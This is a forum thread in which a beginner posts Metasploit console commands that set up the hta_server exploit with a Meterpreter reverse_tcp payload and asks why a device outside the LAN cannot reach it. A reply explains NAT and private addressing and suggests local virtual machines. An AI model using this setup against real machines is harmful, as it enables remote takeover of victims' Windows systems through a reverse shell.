Cannot access hta server with url outside LAN with metasploit, reverse_tcp

I am creating an HTA server for windows.

msf6 > set SRVHOST (my local ip)
SRVHOST => (my local ip)
msf6 > set LHOST (my local ip)
LHOST => (my local ip)
msf6 > set LPORT 12357
LPORT => 12357
msf6 > use exploit/windows/misc/hta_server
[] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > exploit
[
] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[] Started reverse TCP handler on (my local ip):12357
msf6 exploit(windows/misc/hta_server) > [
] Using URL: http://(my local ip):8080/2cvlsLmmrNEhu.hta
[*] Server started.

But when I use my phone, connected to another network, trying to access the URL does not work. I have searched for it but nobody has a similar question. I am a beginner that doesn’t know much, can anybody help me? I have tried replacing the local IP with my public IP, and it shows [-] Handler failed to bind to (my public IP):12357:- - What should I do? I have already forwarded port 8080 in my router preferences.

@tennessine said:

But when I use my phone, connected to another network, trying to access the URL does not work. I have searched for it but nobody has a similar question. I am a beginner that doesn’t know much, can anybody help me? I have tried replacing the local IP with my public IP, and it shows [-] Handler failed to bind to (my public IP):12357:- - What should I do? I have already forwarded port 8080 in my router preferences.

So I dont really know the answer here as I’ve never tried this myself.

However, some networking fundamentals matter.

If your server is running on an IP address listed in RFC1918 as a “local internets” address, then you cant access it from another network without some configuration changes to your networking set up.

If I have a network with a server listening on 10.10.10.10, I cant access that from any device outside the network without some rule set up on the perimeter that routes external traffic to that internal IP.

For example, on my wifi network right now my laptop has IP 192.168.20.201. My phone is on a cellular network and has a 10/8 IP address on that network. If I want to send packets from my phone to my laptop I need the wifi network’s external IP address. Then the packets have to go from the phone network, onto the internet and then hit the external firewall on my wifi network. If I have a rule on the firewall which routes traffic to 192.168.20.201 then would be able to access. If I dont have a rule, the firewall just drops the packet.

You cant, easily, get MSF to just listen on your external IP address - as it still needs the perimeter devices to route traffic and its not really an IP address on your device.

You might find it easier to use virtual machines on the same network, rather than try to configure cross-network communications.